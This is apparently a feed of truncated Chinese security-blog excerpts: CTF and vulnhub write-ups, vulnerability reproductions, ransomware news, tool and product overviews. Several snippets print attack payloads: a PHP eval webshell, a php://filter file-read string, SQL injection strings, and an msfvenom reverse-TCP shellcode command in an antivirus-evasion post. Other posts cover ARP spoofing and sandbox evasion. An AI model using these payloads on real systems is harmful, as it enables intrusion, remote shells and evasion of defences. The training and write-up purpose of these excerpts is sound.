前端JS加密测试场景下的困惑在渗透测试过程中经常会遇到JS前端加密的场景，假如不借助任何工具的情况下，我们一般是把JS代码进行扣取，本地进行加解密生成Payload，然后在Burpsuite里进行Payload替换。这种方式就存在一个很明显的问…

vulnhub靶机bluemoon

下载地址：https: //download.vulnhub.com/bluemoon/bluemoon.ova 主机发现目标169 端口扫描服务扫描看一下web 扫描一下web 看一下 thank you是一个链接二维码连接ssh的脚本两个文件看一下说白了就是给了我们一个字典九头蛇搞定登入前面看到是docker就用…

引领AI变革：边缘计算与自然语言处理结合的无尽可能

引言讲到Ai，你第一时间会想到什么？是Chagpt和文心一言这样与人类交流自然的Ai生成式对话服务？还是根据关键字快速制图的Ai绘图？这些都是近年来人们所常知的Ai用途，我们今天来讲讲以自然语言处理为辅，在Ai赋…

THM学习笔记——网络工具

ping 当我们想要测试是否可以连接到远程资源时，会使用 ping 命令。 ping 的基本语法： ping <target>。测试是否可以与百度建立网络连接： traceroute 互联网由许多个不同的服务器和端点组成，它们都相互联网。这意味着&a…

SQL注入：宽字节注入

SQL注入系列文章： 初识SQL注入-CSDN博客 SQL注入：联合查询的三个绕过技巧-CSDN博客 SQL注入：报错注入-CSDN博客 SQL注入：盲注-CSDN博客 SQL注入：二次注入-CSDN博客 SQL注入：order by注入-CSDN博客 …

DNS轮询解析是什么？

传统的负载均衡技术通常需要专门的硬件或软件，但DNS轮询解析是一种负载分配、负载平衡或容错技术，通过管理域名系统（DNS）对来自客户计算机的地址请求的响应，按照适当的统计模型，提供多个冗余的互联网协议服…

DevSecOps 参考模型介绍

目录一、参考模型概述 1.1 概述二、参考模型分类 2.1 DevOps 组织型模型 2.1.1 DevOps 关键特性 2.1.1.1 模型特性图 2.1.1.2 特性讲解 2.1.1.2.1 自动化 2.1.1.2.2 多边协作 2.1.1.2.3 持续集成 2.1.1.2.4 配置管理 2.1.2 DevOps 生命周期 2.1.2.1 研发过程划分…

【网络安全|漏洞挖掘】ChatGPT 再曝安全漏洞，被指泄露私密对话

风靡全球的聊天机器人 ChatGPT 近日再次陷入安全风波，被曝泄露用户同机器人的私密对话，其中包含用户名、密码等敏感信息。 ArsTechnica 网站援引其读者提供的截图报道称，ChatGPT 泄露了多段非用户本人的对话内容，包含了大量敏感信…

CTF-WEB进阶与学习

PHP弱类型在进行比较的时候，会先判断两种字符串的类型是否相等，再比较在进行比较的时候，会先将字符串类型转化成相同，再比较如果比较一个数字和字符串或者比较涉及到数字内容的字符串，则字符串会被转换成数值并且…

万户协同办公平台ezoffice wpsservlet接口任意文件上传漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一、漏洞描述万户ezOFFICE协同管理平台是一个综合信息基础应用平台&am…

记一次渗透测试信息收集之swagger-ui未授权

一、swagger-ui未授权目标某api子域，如：http://xxxapi.xxx.com，是springboot默认页面访问 /env /actuator/env 提示404 / 401（无权限访问） 使用dirsearch 进行目录扫描，扫出swagger-ui.html 经测试发…

红队渗透靶机:LORD OF THE ROOT: 1.0.1

目录信息收集 1、arp 2、nmap 3、knock 4、nikto 目录探测 1、gobuster 2、dirsearch WEB sqlmap 爆库爆表爆列爆字段 hydra爆破 ssh登录提权信息收集内核提权信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan -l Interface: eth0, ty…

[SWPUCTF 2021 新生赛]easyupload1.0

发现是上传文件第一想到是文件木马 <?php eval ($_POST[123]);?>木马上传burp修改后缀发现flag里面这个是假的我们猜想是在phpinfo我们上传<?php eval(phpinfo(););?>木马上传burp修改后缀里面 CtrlF 发现flag

Linux/Spectra

Enumeration nmap 第一次扫描发现系统对外开放了22，80和3306端口，端口详细信息如下 22端口运行着ssh，80端口还是http，不过不同的是打开了mysql的3306端口 TCP/80 进入首页，点击链接时，提示域名不能解析&…

观成科技：加密C2框架Covenant流量分析

工具介绍 Covenant是一个基于.NET的开源C2服务器，可以通过HTTP/HTTPS 控制Covenant agent，从而实现对目标的远程控制。Covenant agent在与C2通信时，使用base64/AES加密载荷的HTTP隧道构建加密通道。亦可选择使用SSL/TLS标准加密协议&#xf…

网络安全产品之准入控制系统

文章目录一、什么是准入控制系统二、准入控制系统的主要功能1. 接入设备的身份认证2. 接入设备的安全性检查三、准入控制系统的工作原理四、准入控制系统的特点五、准入控制系统的部署方式1. 网关模式2. 控制旁路模式六、准入控制系统的应用场景七、企业如何利用准入控制系统…

第二届 N1CTF Junior WEB方向部分题解WP

zako 题目描述：很简单的rce哦启动环境，源码直接给了。 execute.sh #!/bin/bashreject(){echo ${1}exit 1 }XXXCMD$1awk -v str"${XXXCMD}" \ BEGIN{deny";&$(){}[]!#$%^&*-";for(i 1; i < length(str); i){char su…

网络安全产品之认识准入控制系统

文章目录一、什么是准入控制系统二、准入控制系统的主要功能1. 接入设备的身份认证2. 接入设备的安全性检查三、准入控制系统的工作原理四、准入控制系统的特点五、准入控制系统的部署方式1. 网关模式2. 控制旁路模式六、准入控制系统的应用场景七、企业如何利用准入控制系统…

CVE-2012-2311 漏洞复现

CVE-2012-2311 这个漏洞被爆出来以后，PHP官方对其进行了修补，发布了新版本5.4.2及5.3.12，但这个修复是不完全的，可以被绕过，进而衍生出CVE-2012-2311漏洞。 PHP的修复方法是对-进行了检查： if(query_str…

Phobos捆绑某数控软件AdobeIPCBroker组件定向勒索

前言 Phobos勒索病毒最早于2019年被首次发现并开始流行起来，该勒索病毒的勒索提示信息特征与CrySiS(Dharma)勒索病毒非常相似，但是两款勒索病毒的代码特征却是完全不一样，近日笔者在逛某开源恶意软件沙箱的时候发现了一款Phobos勒索病毒捆绑…

企业计算机服务器中了mkp勒索病毒怎么办？Mkp勒索病毒解密处理

随着网络技术的不断发展，企业的生产运营也加大了步伐，网络为企业的生产运营提供了强有力保障，但网络是一把双刃剑，给企业带来便利的同时也为企业带来了严重的数据威胁。春节期间，云天数据恢复中心接到很多企业的值班人…

【复现】某某ERP 信息泄露漏洞_49

目录一.概述二 .漏洞影响三.漏洞复现 1. 漏洞一： 四.修复建议： 五. 搜索语法： 六.免责声明一.概述该ERP基于SpringBoot框架和SaaS模式，立志为中小企业提供开源好用的ERP软件，目前专注进销存财务生产功能。…

Legba：一款功能强大的多协议凭证爆破与密码喷射枚举工具

关于Legba Legba是一款功能强大的多协议凭证爆破与密码喷射枚举工具。该工具的目的就是在消耗更少资源的同时实现更好的性能和稳定性，可以帮助广大研究人员执行多种协议场景下的凭证爆破，以及密码喷射和枚举任务。支持的协议和功能 AMQP（…

8、内网安全-横向移动RDPKerberos攻击SPN扫描WinRMWinRS

用途：个人学习笔记，有所借鉴，欢迎指正目录一、域横向移动-RDP-明文&NTLM 1.探针服务： 2.探针连接： 3.连接执行： 二、域横向移动-WinRM&WinRS-明文&NTLM 1.探针可用： 2.连接…

【复现】Panalog大数据日志审计系统 RCE漏洞_51

目录一.概述二 .漏洞影响三.漏洞复现 1. 漏洞一： 四.修复建议： 五. 搜索语法： 六.免责声明一.概述 Panalog大数据日志审计系统定位于将大数据产品应用于高校、公安、政企、医疗、金融、能源等行业之中，针对网络流…

入门【网络安全/黑客】启蒙教程

当我们谈论网络安全时，我们正在讨论的是保护我们的在线空间，这是我们所有人的共享责任。网络安全涉及保护我们的信息，防止被未经授权的人访问、披露、破坏或修改。一、网络安全的基本概念网络安全是一种保护：它涉及保护我们的设…

一款开源漏洞预警平台

前言漏洞是黑客攻击常用的武器之一，也是各种恶意软件的常用载体，各种恶意软件会利用漏洞进行扩散传播，也会利用漏洞进行提权等操作，还会将漏洞作为自身传播的载体，不管是0day、1day或者是Nday，在各种黑客…

网络安全“降本增笑”的三大帮手

在网络安全这个快速变化和危机四伏的领域中，通过使用正确的工具和方法，我们可以在工作中取得更高的效率，并降低相关成本。雷池社区版雷池社区版—开源Web应用防火墙。这款产品凭借强大的规则引擎，它允许用户自定义安全策略&…

企业计算机服务器中了crypt勒索病毒怎么办，crypt勒索病毒解密数据恢复

计算机服务器设备为企业的生产运营提供了极大便利，企业的重要核心数据大多都存储在计算机服务器中，保护企业计算机服务器免遭勒索病毒攻击，是一项艰巨的工作任务。但即便很多企业都做好的了安全运维工作，依旧免不了被勒索病毒攻击…

WordPress关键漏洞影响25000+站点；Cisco漏洞被勒索软件利用；朝鲜黑客瞄准全球国防公司 | 安全周报 0223

1. CISA警告：Akira勒索软件正在利用Cisco ASA/FTD 漏洞近日，美国网络安全和基础设施安全局（CISA）发布了一份警告，指出Akira勒索软件正在积极利用Cisco的Adaptive Security Appliance (ASA) 和 Firepower Threat Defe…

从零开始学IO_FILE的堆利用：理解IO_FILE之fopen

要学习基于IO_FILE的堆利用就得了解它的本质，以下会介绍几个主要的IO函数，结合源码和动态调试去学习。调试环境搭建可参考环境从零开始配置pwn环境：从零开始配置pwn环境：优化pwn虚拟机配置支持libc等指令-CSDN博客 1.首先是编写一…

邮件发送/接收过程分析、常见邮箱sport/dport列举、检测规则开发思路分析

一、邮件发送和接收过程分析 （转载自：邮件的发送和接收过程——STMP、POP、IMAP、MIME_当收件人接收电子邮件时自己的邮件服务器通过什么收文件-CSDN博客） 电子邮件发送协议是一种基于“ 推 ”的协议，主要包括 SMTP &#xff1…

Sqli-labs靶场第8关详解[Sqli-labs-less-8]

Sqli-labs-Less-8 前言： SQL注入的三个条件： ①参数可控；（从参数输入就知道参数可控） ②参数过滤不彻底导致恶意代码被执行；（需要在测试过程中判断） ③参数带入数据库执行。&#…

信息安全管理与评估赛题解析-应急响应（含环境）

服务器应急响应文章目录服务器应急响应题目：答案：192.168.1.7答案：Linux x86_64答案：shodan答案：DIRSEARCH答案：24/Apr/2022:15:26:42答案：2022答案：/var/www/html/footer.php答案：./prism答案：/root/.mal/prism答案：后门行为相关资源

如何将域名解析成IP地址？

相对于繁琐的IP地址，域名以其简便的记忆方式成为人们访问网站的首选。然而，计算机通讯的本质需要使用IP地址，而计算机并不直接理解域名。在这个过程中，域名解析成为了关键一环，而这项任务由DNS（域名系统&am…

BUU [CISCN2019 华东南赛区]Web4

BUU [CISCN2019 华东南赛区]Web4 题目描述：Click to launch instance. 开题： 点击链接，有点像SSRF 使用local_file://协议读到本地文件，无法使用file://协议读取，有过滤。 local_file://协议： local_file…

防御第六次作业

DPI DPI --- 深度包检测技术 --- 主要针对完整的数据包（数据包分片，分段需要重组），之后对数据包的内容进行识别。（应用层） 1，基于“特征字”的检测技术 --- 最常用的识别手段，基于…

buuctf_web_loveSQL

题目： 上面有行小红字，“用 sqlmap 是没有灵魂的”,呵呵。。嗯，确实啥也憋说，先上万能钥匙： a or 11 # a’ or 11 # a" or 11 # 尝试后的结果，可以发现该SQL验证是单引号，a or 11 #注入过…

2024 hgame --- Crypto wp

文章目录 week1easymatheasyrsaezPRNG week2midRSAmidRSA revengebabyRSAbackpackbackpack revenge week3exRSAmatrix_equationHNP week4transformationlastRSA week1 easymath 题目： from Crypto.Util.number import * from Crypto.Cipher import AES import ra…

HTTPS的加密过程

文章目录前言一、为什么需要加密？二、只用对称加密可以吗？三、只使用非对称加密四、双方都使用非对称加密五、使用非对称加密对称加密六、引入证书1.如何放防止数字证书被篡改？2.中间人有可能篡改该证书吗？3.中间人有可能掉包该证…

视觉AIGC识别——人脸伪造检测、误差特征 + 不可见水印

视觉AIGC识别——人脸伪造检测、误差特征不可见水印前言视觉AIGC识别【误差特征】DIRE for Diffusion-Generated Image Detection方法扩散模型的角色DIRE作为检测指标实验结果泛化能力和抗扰动人脸伪造监测（Face Forgery Detection）人脸伪造图生成 …

网络安全与信创产业发展：构建数字时代的护城河

✨✨ 欢迎大家来访Srlua的博文（づ￣3￣）づ╭❤～✨✨ 🌟🌟 欢迎各位亲爱的读者，感谢你们抽出宝贵的时间来阅读我的文章。我是Srlua，在这里我会分享我的知识和经验。&#x…

链路负载均衡之ISP选路

一、默认路由与链路备份如图，企业分别从电信、联通租用一条链路，组成双出口网络，其中，电信为主链路、联通为备用链路。在防火墙可配置两条默认路由，其中电信出口的默认路由优先级高于联通出口的默认路由&#xff0c…

PoC免写攻略

在网络安全领域，PoC（Proof of Concept）起着重要的作用，并且在安全研究、漏洞发现和漏洞利用等方面具有重要的地位。攻击方视角下，常常需要围绕 PoC 做的大量的工作。常常需要从手动测试开始编写 PoC，再到实…

新能源汽车产业架构设计与实现：引领未来出行新风向

随着环保意识的增强和能源结构的转型，新能源汽车产业正迅速崛起成为汽车行业的新宠。构建一个完善的新能源汽车产业架构对于推动产业发展、提升竞争力至关重要。本文将从设计原则、关键技术、产业生态等方面，探讨如何设计与实现新能源汽车产业架构。 ##…

Web应用安全威胁与防护措施

本文已收录至《全国计算机等级考试——信息安全技术》专栏由于极其容易出现漏洞、并引发安全事故，因此数据隐私的保护是目前绝大多数企业不可绕过的运维环节。不过，许多中小型企业往往会错误地认为只有大型企业才会成为黑客的目标。而实际统计数字却截…

模拟器抓HTTP/S的包时如何绕过单向证书校验（XP框架）

模拟器抓HTTP/S的包时如何绕过单向证书校验（XP框架） 逍遥模拟器无法激活XP框架来绕过单向的证书校验，如下图： 解决办法： 安装JustMePlush.apk安装Just Trust Me.apk安装RE管理器.apk安装Xposedinstaller_逍遥64位…

【华为 ICT HCIA eNSP 习题汇总】——题目集16

1、下面哪一个最适合使用室内分布方式部署 WLAN？ A、运动场 B、办公室 C、高校单排宿舍 D、广场考点：无线局域网解析：（C） 室内分布方式部署 WLAN 一般适用于需要大面积、高密度、高质量无线覆盖的场所，从…

upload-labs 0.1 靶机详解

下载地址https://github.com/c0ny1/upload-labs/releases Pass-01 他让我们上传一张图片，我们先尝试上传一个php文件发现他只允许上传图片格式的文件，我们来看看源码我们可以看到它使用js来限制我们可以上传的内容但是我们的浏览器是可以关闭js功能的…

【题目】【网络系统管理】2022年江苏省职业院校技能大赛高职竞赛样题

极安云科专注职业教育技能竞赛培训4年，包含信息安全管理与评估、网络系统管理、网络搭建等多个赛项及各大CTF模块培训学习服务。本团队基于赛项知识点，提供完整全面的系统性理论教学与技能培训，成立至今持续优化教学资源与讲师结构&#xff0…

PwnLab靶场PHP伪协议OSCP推荐代码审计命令劫持命令注入

下载链接：PwnLab: init ~ VulnHub 安装： 打开vxbox直接选择导入虚拟电脑即可正文： 先用nmap扫描靶机ip nmap -sn 192.168.1.1/24 获取到靶机ip后，对靶机的端口进行扫描，并把结果输出到PwnLab文件夹下，命名…

DNS劫持怎么预防？

DNS劫持，也称为域名劫持，是一种网络攻击手段，攻击者通过拦截域名解析的请求，将用户重定向到恶意站点，以达到获取用户信息或谋取非法利益的目的。DNS劫持可以分为以下几种基本类型： 1.路由器DNS劫持&#x…

【复现】蓝凌OA SQL注入漏洞_61

目录一.概述二 .漏洞影响三.漏洞复现 1. 漏洞一： 四.修复建议： 五. 搜索语法： 六.免责声明一.概述蓝凌智能OA是由深圳市蓝凌软件股份有限公司开发，是一款针对中小企业的移动化智能办公产品，融合了钉钉数字…

室友打团太吵？一条命令断掉它的WiFi

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：更多干货，请关注专栏《网络安全自学教程》 ARP欺骗原理 1、arpspoof实现ARP欺骗1.1、主机探测1.2、欺骗…

[攻防世界]-Web:fileinclude解析（文件包含，添加后缀）

查看网页查看源代码意思就是，如果变量lan被设置就会触发文件包含。但是要注意，这里的文件包含会自动加上后缀，所以payload要注意一点 payload： languagephp://filter/readconvert.base64-encode/resourceflag

7. 构建简单 IPv6 网络

7.1 实验介绍 7.1.1 关于本实验 IPv6（Internet Protocol Version 6）也被称为IPng（IP Next Generation）。它是Internet工程任务组IETF（Internet Engineering Task Force）设计的一套规范，是IPv4…

信息收集：端口扫描原理，端口扫描分类，端口扫描工具，手动判断操作系统，操作系统识别工具

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「专栏简介」：此文章已录入专栏《网络安全自学教程》端口&系统版本一、端口扫描1、telnet2、Nmap3、Masscan4、端口扫描原…

USB4之ASM2464PD与ASM2464PDX兼容与运用

首先在NVMe上运用: 一：ASM2464PD（现在可以做带PD的方案） 二：ASM2464PDX 1： Application Guide- CFX card reader NVMe SSD 2：ASM2464PDX Application Guide- NVMe SSD x4 with data clone 三&#xff…

Fastjson2 ＜== 2.0.26反序列漏洞

根据Y4TACKER师傅在2023-03-20发布了一篇关于Fastjson原生反序列化的文章，文章中引入注目的是利用条件限制条件，不常常关注漏洞预警或者内容的几乎都是未发觉Fastjson2 到Fastjson2 2.0.26版本都有问题，其实如果单独去使用一些关键词去搜索&a…

查看网络连接的netstat

netstat是一个监控TCP/IP网络的非常有用的工具，可以显示路由表、实际的网络连接，以及每一个网络接口设备的状态信息，可以让用户得知目前都有哪些网络连接正在运作。netstat用户显示与IP、TCP、UDP和ICMP协议相关的统计数据，一般用…

应急响应靶机训练-Web3题解

前言接上文，应急响应靶机训练-Web3。前来挑战！应急响应靶机训练-Web3 题解首先登录用户administrator 寻找隐藏用户找到隐藏用户hack6618$ 然后去找apache的日志文件分析得出两个IP地址 192.168.75.129 192.168.75.130 然后更换hack6618$的…

MS12_020 漏洞利用与安全加固

文章目录环境说明1 MS12_020 简介2 MS12_020 复现过程3 MS12_020 安全加固环境说明渗透机操作系统：kali-linux-2024.1-installer-amd64漏洞复现操作系统: cn_win_srv_2003_r2_enterprise_with_sp2_vl_cd1_X13-46432 1 MS12_020 简介 MS12_020 漏洞全称为&#x…

HCIP的学习（2）

TCP----传输控制协议是一种面向连接的可靠传输协议。注：与我之前博客HCIA的学习（2）结合一起看面向连接：数据传输前收发双方建立一条逻辑通路特点： TCP是一种面向连接的传输协议每一条TCP连接有且只能存在两个端…

16.WEB渗透测试--Kali Linux（四）

免责声明：内容仅供学习参考，请合法利用知识，禁止进行违法犯罪活动！ 内容参考于： 易锦网校会员专享课上一个内容：15.WEB渗透测试--Kali Linux（三）-CSDN博客 1.crunch简介与使用 C…

网络安全（黑客技术）—0基础自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

NISP证书是什么？NISP含金量如何呢？

一、NISP是什么 NISP证书是国家信息安全水平考试（National Information Security Test Program，简称NISP），是由中国信息安全测评中心实施培养国家网络空间安全人才的项目。由国家网络空间安全人才培养基地运营/管理，并…

浅谈DDoS攻击和CC攻击的区别

什么是DDoS攻击和CC攻击一、DDoS攻击就是分布式的拒绝服务攻击，DDoS攻击手段是在传统的DoS攻击(拒绝服务攻击)基础之上产生的一类攻击方式。单一的DoS攻击一般是采用一对一方式的，通过制造并发送大流量无用数据，造成通往被攻击主机的网络拥…

战队集结蓄势而发 | 网安朝阳·西门子白帽黑客大赛

网安朝阳西门子白帽黑客大赛国际精英挑战赛在北京市朝阳区人民政府的鼎力支持下将于10月12日整装启航经过层层选拔 48名顶尖网安高手组建8支CTF精英战队向冠军之位发起挑战 01、赛制创新发布白帽黑客大赛，是西门子中国网络与信息安全社群——西安社&#…

OID的编解码

我们常见到OID的地方是SNMP和MIB，实际上理论上所有对象都可以有自己的ID。已存在的ID可以在http://www.oid-info.com/查到。这些ID在报文里并非字符串或直接的文本而是遵循的规则可以在https://docs.microsoft.com/zh-cn/windows/desktop/SecCertEnroll/about-objec…

内网穿透--cpolar

工具介绍 cpolar是一种安全的内网穿透云服务，它将内网下的本地服务器通过安全隧道暴露至公网。使得公网用户可以正常访问内网服务。下载位置 cpolar官网：cpolar - 安全的内网穿透工具创建隧道映射 cpolar安装成功后，双击打开cpolar web u…

web：[ACTF2020 新生赛]Include

前提知识文件包含漏洞 php伪协议题目点开题目，页面只显示一个tips，点进去看看点进去之后没有别的提示，先看源代码，恩，什么都没有再看一下点进tips显示的页面，发现url中 flag可能就藏在这个页面中&…

【网络安全】2023年堡垒机品牌大全

随着大家网络安全意识的增加，随着国家等保政策的严格执行，越来越多的企业开始采购堡垒机。这里就给大家总结了部分堡垒机品牌，让大家参考参考。 2023年堡垒机品牌大全 1、行云堡垒 2、JumpServer 3、安恒 4、骞云 5、齐治 6、阿里云 …

自学成为一名黑客（自学笔记）

前言： 想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“…

self-XSS漏洞SRC挖掘

本文由掌控安全学院 - 一朵花花酱投稿 Markdown是一种轻量级标记语言，创始人为约翰格鲁伯（John Gruber）。它允许人们使用易读易写的纯文本格式编写文档，然后转换成有效的 XHTML（或者HTML）文档。这种语言吸…

crypto：大帝的密码武器

题目下载zip之后可得到提示文本结合题目名和文本提示可知，为凯撒密码利用脚本，爆破位移的位数 str1 FRPHEVGL str2 str1.lower() num 1 for i in range(26):print("{:<2d}".format(num),end )for j in str2:if(ord(j)num > or…

cad图纸如何防止盗图（一个的制造设计型企业如何保护设计图纸文件）

在现代企业中，设计图纸是公司的重要知识产权，关系到公司的核心竞争力。然而，随着技术的发展，员工获取和传播设计图纸的途径越来越多样化，如何有效地防止员工复制设计图纸成为了企业管理的一大挑战。本文将从技术、管理…

Adobe Acrobat Reader 中的漏洞

另一个流行漏洞 Adobe Acrobat 和 Acrobat Reader - 流行的便携式文档格式 (PDF) 工具 - 存在风险。该漏洞 CVE-2023-26369影响 Windows 和 macOS 安装。攻击者创建的恶意 PDF 文档打开后，会利用与在缓冲区外写入有关的 CVE-2023-26369漏洞。因此，攻击…

Pikachu靶场——XXE 漏洞

文章目录 1. XXE1.1 查看系统文件内容1.2 查看PHP源代码1.3 查看开放端口1.4 探测内网主机 1. XXE 漏洞描述 XXE（XML External Entity）攻击是一种利用XML解析器漏洞的攻击。在这种攻击中，攻击者通过在XML文件中插入恶意实体来触发解析器加载…

web：[极客大挑战 2019]BabySQL

题目点进页面显示如下查看源代码先尝试一下万能密码没用，or被过滤了试着双写看看回显一串，也不是flag 先查询列数尝试一下，把union select过滤了，使用双写构造payload /check.php?usernameadmin&password1 %27 ununi…

安全基础 --- MySQL数据库解析

MySQL的ACID （1）ACID是衡量事务的四个特性原子性（Atomicity，或称不可分割性）一致性（Consistency）隔离性（Isolation）持久性（Durability） &…

Java反序列化和PHP反序列化的区别

文章目录 PHP反序列化漏洞什么是反序列化漏洞？修改序列化后的数据，目的是什么？ Java反序列化漏洞那么漏洞点在哪里?漏洞成因什么是反序列化漏洞？ 反序列化存在的意义是为了数据传输，类是无法直接进行传输的。通过序列…

【网络安全】网络安全之信息收集和信息收集工具讲解，告诉你黑客是如何信息收集的

一，域名信息收集 1-1 域名信息查询可以用一些在线网站进行收集，比如站长之家域名Whois查询 - 站长之家站长之家-站长工具提供whois查询工具，汉化版的域名whois查询工具。https://whois.chinaz.com/ 可以查看一下有没有有用的信息&#xf…

上网行为监管软件（上网行为管理软件通常具有哪些功能）

在我们的日常生活中，互联网已经成为了我们获取信息、交流思想、进行工作和娱乐的重要平台。然而，随着互联网的普及和使用，网络安全问题也日益突出，尤其是个人隐私保护和网络行为的规范。在这个背景下，上网行为审计软件…

免杀对抗-C#+go语言-混淆+防反编译+分离

C#&NET-ShellCode-生成/上线一、生成： 1.msf生成C#语言的shellcode 命令：msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.206.192 LPORT4444 -e x86/shikata_ga_nai -i 15 -f csharp 二、上线： 1.c#语言shellcode加载代…

内网渗透之哈希传递

文章目录哈希传递（NTLM哈希）概念LMNTLM 原理利用hash传递获取域控RDP 总结哈希传递（NTLM哈希） 内网渗透中找到域控IP后使用什么攻击手法拿下域控： 扫描域控开放端口。因为域控会开放远程连接：windows开…

Pikachu靶场——目录遍历漏洞和敏感信息泄露

文章目录 1. 目录遍历漏洞1.1 源码分析1.2 漏洞防御 2. 敏感信息泄露2.1 漏洞防御 1. 目录遍历漏洞漏洞描述目录遍历漏洞发生在应用程序未能正确限制用户输入的情况下。攻击者可以利用这个漏洞，通过在请求中使用特殊的文件路径字符（如 …/ 或 %2e%2e…

深信服SG上网优化管理系统存在任意文件读取漏洞附POC

文章目录深信服SG上网优化管理系统存在任意文件读取漏洞附POC1. 深信服SG上网优化管理系统简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾深信服SG上网优化管理系统存在任意文件读取漏洞附POC 免责声明：请勿利用文章内的…

Pikachu靶场——不安全的文件下载(Unsafe Filedownload)

文章目录 1. Unsafe Filedownload1.1 Unsafe Filedownload1.1.1 源代码分析1.1.2 漏洞防御 1.2 不安全的文件下载防御措施 1. Unsafe Filedownload 不安全的文件下载概述： 文件下载功能在很多web系统上都会出现，一般我们当点击下载链接，便会…

web漏洞-xml外部实体注入(XXE)

web漏洞-xml外部实体注入（XXE） 目录 web漏洞-xml外部实体注入（XXE）概念危害检测方法利用方法漏洞利用xxe-lab有回显情况无回显情况 pikachu靶场有回显内容无回显修复方案概念 xml可拓展标记语言： xml是一种可拓展的标…

PHP会话技术跟踪和记录用户？使用cookie会话你必须掌握

🎬 鸽芷咕：个人主页 🔥 个人专栏:《速学数据结构》《C语言进阶篇》 ⛺️生活的理想，就是为了理想的生活! 文章目录 📋 前言会话技术的概述一. Cookie简介二. Cookie基本使用——创建Cookie2.1 创建Cookie演示实例&am…

练[MRCTF2020]Ez_bypass

[MRCTF2020]Ez_bypass 文章目录 [MRCTF2020]Ez_bypass掌握知识解题思路关键paylaod 掌握知识代码审计，md5函数绕过，is_numeric函数绕过，弱等于的字符串和数字类型绕过解题思路打开题目链接，发现是代码审计题目&#xff0…

容器安全检测工具KubeHound使用

目录前言安装下载kubehound 启动kubehound后端服务连接服务器参考前言 Kubernetes集群攻击路径AES工具安装

网络安全（黑客）小白学习笔记

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

华测监测预警系统 2.2 任意文件读取漏洞复现 [附POC]

文章目录华测监测预警系统 2.2 任意文件读取漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议华测监测预警系统 2.2 任意文件读取漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章…

有没有普通人也能赚钱的副业？挖漏洞兼职！

如何开展副业？网络安全月入过万！ 随着大数据和人工智能的兴起。各行业对信息安全和网络安全服务的需求量呈指数级的暴增。这不最近，一个做运维的朋友在学网络安全。他告诉我，他靠挖漏洞赚钱上个月月入过万了，好香啊…

渗透测试怎么入门？（超详细解读）

1. 什么是渗透测试渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估，与黑客攻击不一样的是，渗透测试的目的是尽可能多地发现安全漏洞，而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程…

一文搞懂APT攻击

APT攻击 1. 基本概念2. APT的攻击阶段3. APT的典型案例参考 1. 基本概念高级持续性威胁（APT，Advanced Persistent Threat），又叫高级长期威胁，是一种复杂的、持续的网络攻击，包含高级、长期、威胁三个要素…

大华智慧园区前台任意文件上传(1day)

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。漏洞简介大华智慧园区综合管理平台是一个集智能化、信息化、网络化、…

地级市HVV | 未授权访问合集

在网站前后端分离盛行下，将大部分权限控制交给前端，导致js中隐藏未授权或者可绕过的前端鉴权。前后端分离的好处是提高开发效率，同时防止黑客更直接的对服务器造成危害，但权限控制的工作量全部交给前端会导致大量页面未授权或者后…

研究发现 IT 安全对高等教育非常重要

最近的研究表明，高等教育机构越来越重视信息技术安全。本博客深入探讨了这些最新发现，重点介绍了在威胁不断升级和数字格局不断变化的情况下，在学术环境中加强网络安全措施的迫切需求和战略方法。高等教育中不断升级的威胁格局穿越21世纪…

免杀对抗-反沙盒+反调试

反VT-沙盒检测-Go&Python 介绍： 近年来，各类恶意软件层出不穷，反病毒软件也更新了各种检测方案以提高检率。其中比较有效的方案是动态沙箱检测技术，即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说…

黑客技术（网络安全）——自学思路

如果你想自学网络安全，首先你必须了解什么是网络安全！，什么是黑客！！ 1.无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web 安全技术，既有 Web 渗透2.也有 Web 防…

干货！SRC漏洞挖掘项目实战经验分享

目录一、hunter上搜索web.title”nacos”，查找中国境内的资产，定位到两个地址。二、访问一下8086端口，界面很明显是nacos，直接抓包，创建用户。三、登录网站，里面看到配置管理。四、查看下redis.yml…

NginxWebUI runCmd 远程命令执行漏洞复现 [附POC]

文章目录 NginxWebUI runCmd 远程命令执行漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 NginxWebUI runCmd 远程命令执行漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相…

鱼哥赠书活动第②期：《AWD特训营：技术解析、赛题实战与竞赛技巧》《ATTCK视角下的红蓝对抗实战指南》《智能汽车网络安全权威指南》上下册

鱼哥赠书活动第①期： 《AWD特训营：技术解析、赛题实战与竞赛技巧》1.1介绍： 《ATT&CK视角下的红蓝对抗实战指南》1.1介绍： 《Kali Linux高级渗透测试》1.1介绍： 《智能汽车网络安全权威指南》上册1.1介绍&#xff…

